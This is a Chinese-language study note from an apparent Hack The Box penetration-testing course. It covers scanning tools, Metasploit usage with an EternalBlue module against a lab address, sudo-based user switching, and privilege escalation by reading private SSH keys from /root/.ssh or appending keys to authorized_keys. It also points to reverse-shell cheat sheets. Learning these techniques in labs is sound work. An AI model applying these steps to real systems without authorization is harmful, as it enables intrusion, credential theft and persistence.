HTB渗透测试课程初探

渗透测试课程

流程

服务扫描:nmap、SMB、SNMP等

Web服务:GoBuster、ffuf等

在野漏洞利用:Metasploit、searchsploit

MetaSploit使用

  • 启动
    输入msfconsole启动MetaSploit。

  • 搜索
    可以使用search命令进行搜索,如search exploit eternalblue

  • 使用
    找到exp了后可以用use命令使用,如use exploit/windows/smb/ms17_010_psexec

  • 设置
    需要使用show options进行设置,如set RHOSTS 10.10.10.40set LHOST tun0LHOST代表本地主机,即攻击者机器的IP地址。RHOST代表远程主机,即目标机器的IP地址。

  • 检查
    运行前可以运行check检查

  • 运行
    运行run或者exploit开始exploit

一些用户切换和提权的小笔记

sudo -l

sudo -l 可以显示目前拥有什么sudo权限

1
2
3
4
5
6
user1@ng-1401667-gettingstartedprivesc-hubgy-5dcd7dc5c8-7mb9m:~$ sudo -l
Matching Defaults entries for user1 on ng-1401667-gettingstartedprivesc-hubgy-5dcd7dc5c8-7mb9m:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on ng-1401667-gettingstartedprivesc-hubgy-5dcd7dc5c8-7mb9m:
(user2 : user2) NOPASSWD: /bin/bash

这就显示user1有不输入密码使用user2的/bin/bash的能力。直接sudo -u user2 /bin/bash即可使用sudo权限切到user2的bash。

ssh

可以通过ssh来提权。如果有读权限,可以读/root/.ssh//home/user/.ssh/下的id_rsa文件,就能够使用ssh以root或user的身份登录。如ssh root@10.10.10.10 -i id_rsa,但要注意在登录时需要chmod 600 id_rsa,让我们储存下来的私钥对于其他人来说不可见,不然会自动不使用这个私钥。

如果有写权限,可以把自己的私钥加在/home/user/.ssh/authorized_keys/root/.ssh/authorized_keys文件后。

反向shell小笔记

反向shell可以通过Reverse Shell Cheat SheetReverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python直接抄过来。